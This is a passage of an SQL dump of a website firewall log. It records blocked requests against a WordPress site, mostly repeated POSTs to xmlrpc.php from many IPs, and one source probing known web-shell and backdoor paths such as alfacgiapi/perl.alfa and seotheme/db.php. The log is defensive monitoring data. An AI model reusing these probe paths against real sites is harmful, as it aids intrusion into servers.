Safari\\/537.36\"}','7yviNYMgV9rxhKpFeOQc4naE',0,1681134034.4042,679,'','POST',403,0,515,0,1,'',0),('209.58.183.78',3510286158,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hQevKJ9ZXYd3ztxAFMfw6B4p',0,1681135440.9387,3748,'','POST',403,0,515,0,1,'',0),('74.208.57.218',1255160282,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','dkRYAmvb0O2M1tVeSn5XD8p3',0,1681136220.2075,4851,'','POST',403,0,515,0,1,'',0),('79.170.43.200',1336552392,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','pozXgtKw0F1qMl63uTmNfI8E',0,1681136224.4403,1064,'','POST',403,0,515,0,1,'',0),('159.223.93.124',2682215804,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','Bv3Z6bMCIyHp4mJu80Wj1Vhe',0,1681136229.0094,676,'','POST',403,0,515,0,1,'',0),('5.63.9.39',88017191,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','jdV0f23oYrcvCAGnFyTXxelk',0,1681136239.3781,658,'','POST',403,0,515,0,1,'',0),('163.172.168.158',2746001566,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','2Kwzk5Pg397lCqUxinYA0FMH',0,1681136243.3552,595,'','POST',403,0,515,0,1,'',0),('68.178.145.169',1152553385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','mTayZICbYdANzQvwX172rkp6',0,1681136247.6038,768,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','9irkvSsHBw7JcOxlXVg3RLuD',0,1681136248.2890,681,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','NMGQDYnpq9RV1gOweHyKox6d',0,1681136257.7033,1178,'','POST',403,0,515,0,1,'',0),('74.208.57.218',1255160282,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','c1zNG5EYlxuKXThImFvH4V9R',0,1681136258.1527,1068,'','POST',403,0,515,0,1,'',0),('213.152.161.5',3583549701,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vd5XNgLCOcKJWnr9TUGf4jaM',0,1681137761.9016,663,'','POST',403,0,515,0,1,'',0),('185.195.237.203',3116625355,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QKvjORAntlUBX0JoSkHf6VqP',0,1681137778.6341,553,'','POST',403,0,515,0,1,'',0),('213.152.161.5',3583549701,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ry0cVk3I5HWo68qNjvQaM1sf',0,1681138109.7449,685,'','POST',403,0,515,0,1,'',0),('139.28.218.235',2333924075,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','IvyE7cRPgNGfMLYTmHjrkbZx',0,1681139474.8985,5149,'','POST',403,0,515,0,1,'',0),('141.98.102.227',2372036323,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DJWX6e9PVA1SEbkhFao0zmsC',0,1681139994.7581,3671,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','dkfn0SwEOPrImziTljtuC3xo',0,1681140114.8380,2721,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','7nfi1BT4qaSsbHvyOgrLmG3e',0,1681140117.4991,809,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','KF7pEPoaMWINVtDcknOzJyAm',0,1681140128.1348,596,'','POST',403,0,515,0,1,'',0),('163.172.168.158',2746001566,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','3AncH6Gq4rtUYTWbJfvOCBoI',0,1681140132.0838,573,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','JEwVGBeljPc0fQAFWYtLNxDz',0,1681140135.4079,614,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','M8FoDIH0KO3GiTCbB1ksvdmg',0,1681140138.2060,1689,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','hXmKIqMwxOPWG7nl0T3cuzdH',0,1681140142.7234,567,'','POST',403,0,515,0,1,'',0),('15.206.123.128',265190272,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','BJSaycQCLK9fqjd0Imkp76TO',0,1681141382.4465,3921,'','POST',403,0,515,0,1,'',0),('68.183.179.155',1152889755,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','06rdjBGEwIQyXet84zVaHbq2',0,1681141389.8505,547,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','adnbVKLWf9OihmX6TcJQC0FB',0,1681141393.4334,545,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','FoLc82bzQKBn4lt7VT0hea5u',0,1681141403.1561,647,'','POST',403,0,515,0,1,'',0),('68.178.201.128',1152567680,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','vjPrkFXt5i6xGMYIEmzncubL',0,1681141405.7169,567,'','POST',403,0,515,0,1,'',0),('207.244.252.195',3488939203,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','2DyAcefaoXiZHkMtuTxzYhEl',0,1681141407.4723,597,'','POST',403,0,515,0,1,'',0),('139.59.120.161',2335930529,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','uSJ9UNi3qOsdtyn4c8C2mBDT',0,1681141422.5667,1003,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','oZYjXTnLEHu2pBMiW5wCNF48',0,1681141425.2292,663,'','POST',403,0,515,0,1,'',0),('162.219.176.3',2732306435,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','1yivxEGuH2PbZLfrzSRIsQaN',0,1681141688.3519,3869,'','POST',403,0,515,0,1,'',0),('199.249.223.130',3355041666,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','azt1yYK3P76dTHkUbDGjJX90',0,1681143387.5574,3561,'','POST',403,0,515,0,1,'',0),('213.152.162.89',3583550041,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QreU02Ok1lAhKFEvsJNIXnoB',0,1681143944.3926,4094,'','POST',403,0,515,0,1,'',0),('213.152.162.89',3583550041,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','n82FaTyiDMJAKXEZrkQ1Bso6',0,1681144233.1696,4305,'','POST',403,0,515,0,1,'',0),('185.200.116.211',3116922067,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vPdnQiBOrpleb4kAJaRyYE8Z',0,1681145575.4487,726,'','POST',403,0,515,0,1,'',0),('91.214.169.69',1540794693,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','7KsfkU8NdGO5nzEuSwZmLWXl',0,1681145580.8993,568,'','POST',403,0,515,0,1,'',0),('193.37.254.35',3240492579,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','7s2QmHSkfxbErPIAutZNR4vC',0,1681146555.5017,2152,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','spSf6i5htyON3glZncCoGE7d',0,1681147152.4387,1293,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','1aI6BkJwmnxiSzZ4fWhtqKeL',0,1681147154.8887,736,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','ezMHyj5KNvGrh3QmLfE8qbd7',0,1681147161.2849,637,'','POST',403,0,515,0,1,'',0),('103.142.25.164',1737365924,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','Bn2yNsfHDx4XU5SjctKhwaEC',0,1681147166.0965,669,'','POST',403,0,515,0,1,'',0),('94.124.93.44',1585208620,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DkEIAgSmLtnbcWiGHNB4e7oQ',0,1681147167.0437,566,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','8IqsaAeB7gW14LJSRzNrH6jw',0,1681147169.7229,550,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','iPKRDIjBcNwkXgzU5xTG9Jf3',0,1681147177.4885,579,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','ylGEPLCm8RX2x6hdieUjtHwF',0,1681147182.4105,598,'','POST',403,0,515,0,1,'',0),('157.245.147.60',2650116924,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','XRuvNnHhCfMF8Yzq2mrPApJx',0,1681147192.8430,1512,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','2hlg14t8SzIqYNB6n7D0wO3Z',0,1681147192.5190,2253,'','POST',403,0,515,0,1,'',0),('89.238.150.43',1508808235,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','NDWSEkUhKXg8P0Yzf7aBr2HQ',0,1681147425.5087,1277,'','POST',403,0,515,0,1,'',0),('46.183.216.163',783800483,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','B3mYEzCgQADexpkVniu7Gh9t',0,1681147936.6827,720,'','POST',403,0,515,0,1,'',0),('46.183.220.203',783801547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QLVqSOClia8yTF4ZBPhYEumd',0,1681148159.0036,755,'','POST',403,0,515,0,1,'',0),('134.19.179.163',2249438115,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','GKCimeAULINwgVakFzfWEc4T',0,1681149044.3035,3666,'','POST',403,0,515,0,1,'',0),('20.219.195.153',349946777,'','http://cmdev-site1.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','WmvQBD51KUcyiRZNC72M8r0s',0,1681150439.6471,1831,'','POST',403,0,700,0,1,'',0),('20.219.195.153',349946777,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','GYH4sFW6x71LZe5dkIKBmSoU',0,1681150439.6523,1826,'','GET',403,0,700,0,1,'',0),('20.219.195.153',349946777,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','SHfk8EJbjTDN30AMOCQthynw',0,1681150442.8382,2610,'','GET',403,0,700,0,1,'',0),('20.219.195.153',349946777,'','https://cmdev-site1.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','D98RxGl7HgkQ4NKXLEm5Yu1v',0,1681150443.0452,2500,'','POST',403,0,700,0,1,'',0),('20.219.195.153',349946777,'','http://cmdev-site1.com/alfacgiapi/perl.alfa','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','eyUbF3M5xKhtzPlpAs90ZRX4',0,1681150448.3001,310,'','POST',403,0,700,0,1,'',0),('20.219.195.153',349946777,'','http://cmdev-site1.com/wp-content/plugins/apikey/apikey.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','PLqRSczQAJka41Mosw2djHDp',0,1681150450.5591,719,'','GET',403,0,700,0,1,'',0),('20.219.195.153',349946777,'','http://cmdev-site1.com/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','LlCraSJ6oc0Xwhd9UWbYuIgt',0,1681150451.7799,323,'','GET',403,0,700,0,1,'',0),('20.219.195.153',349946777,'','http://cmdev-site1.com/wp-content/plugins/apikey/apikey.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','ejrDzhKAqWpyPfZ0R3k5gxv7',0,1681150452.5028,273,'','GET',403,0,700,0,1,'',0),('20.219.195.153',349946777,'','http://cmdev-site1.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','mwqVAx1rDEC5Yg2o3HXZKTFs',0,1681150453.1924,275,'','GET',403,0,700,0,1,'',0),('2.58.47.203',37367755,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fXq3cWdsYtR47hvI8bCKlirx',0,1681150532.2591,2134,'','POST',403,0,515,0,1,'',0),('64.42.179.35',1076540195,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uLZ4MrPRfY2GBJQwgKmkby8n',0,1681150999.1194,3629,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','Xxr8PsQSR1UB3kyJNlHOCoud',0,1681151824.9576,2483,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','Y6WyMZRoBbX3SPOVNJqm5txU',0,1681151824.4681,3604,'','POST',403,0,515,0,1,'',0),('51.77.231.194',860743618,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','7MuHgB18XPpeTxoaEjlShtJz',0,1681151835.4221,604,'','POST',403,0,515,0,1,'',0),('52.139.225.218',881582554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','yCfG8ZYTP7AiLm3REwjKFbgI',0,1681151846.1015,615,'','POST',403,0,515,0,1,'',0),('79.170.43.200',1336552392,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','UEygDGXdcOJWfH4qojBnmv3A',0,1681151846.9056,586,'','POST',403,0,515,0,1,'',0),('79.170.43.200',1336552392,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','9FhHP1MxZpIJWtOQE4ANsTkK',0,1681151854.5103,556,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','Z7KUlvWFzgbN2eA63BwmH1If',0,1681151857.1368,535,'','POST',403,0,515,0,1,'',0),('74.208.57.218',1255160282,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','U2b08EArKNqMPzXDOGS1JZnv',0,1681151858.9245,564,'','POST',403,0,515,0,1,'',0),('37.32.31.163',622862243,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','WXBZK1hpSUcwfqdItjo3a6Ng',0,1681151881.9878,551,'','POST',403,0,515,0,1,'',0),('141.98.102.227',2372036323,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uG32VKmNzqQFvw06ehZM5jaB',0,1681152190.8302,753,'','POST',403,0,515,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','QJTyRSmv3ja90MoYOHNgZGqu',0,1681152267.2265,601,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','CtHeRDEZbwJdGfkQVlKaXB6h',0,1681152275.2264,585,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','h2VUv3w6Drk0L7Y9Gl84FT5R',0,1681152280.5550,571,'','POST',403,0,515,0,1,'',0),('122.114.158.225',2054332129,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','JCmwg9t8xz2I0fG4MNdsyn5h',0,1681152283.1102,697,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','AODXyWKawdS3xmYtQJHBpZcs',0,1681152293.5784,1330,'','POST',403,0,515,0,1,'',0),('144.76.57.230',2420914662,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','vf28gYXiDtk3JUaSdCMj65cP',0,1681152296.1603,562,'','POST',403,0,515,0,1,'',0),('111.231.4.211',1877411027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','d4jPBJ5Tif0tZcv96NkrQKo8',0,1681152298.7257,558,'','POST',403,0,515,0,1,'',0),('47.242.255.46',804454190,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile 